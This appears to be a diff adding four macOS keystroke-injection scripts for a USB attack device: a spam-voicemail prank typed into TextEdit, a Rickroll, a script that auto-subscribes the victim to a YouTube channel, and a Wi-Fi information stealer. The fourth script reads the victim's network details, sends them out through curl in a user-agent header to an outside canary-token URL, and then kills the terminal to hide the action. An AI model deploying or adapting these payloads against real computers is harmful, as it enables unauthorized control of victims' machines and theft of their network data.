@@ -0,0 +1,10 @@
+REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022
+DELAY 100
+GUI SPACE
+DELAY 1000
+STRING textedit
+ENTER
+DELAY 1000
+GUI N
+DELAY 100
+STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders. 

payload2.txt

@@ -0,0 +1,9 @@
+REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING open "https://youtu.be/dQw4w9WgXcQ"
+ENTER
+DELAY 2000
+SPACE

payload3.txt

@@ -0,0 +1,13 @@
+REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1"
+DELAY 500
+ENTER
+DELAY 4000
+TAB
+TAB
+ENTER
+ENTER

payload4.txt

@@ -0,0 +1,8 @@
+REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 2000
+STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=)
+DELAY 500
+ENTER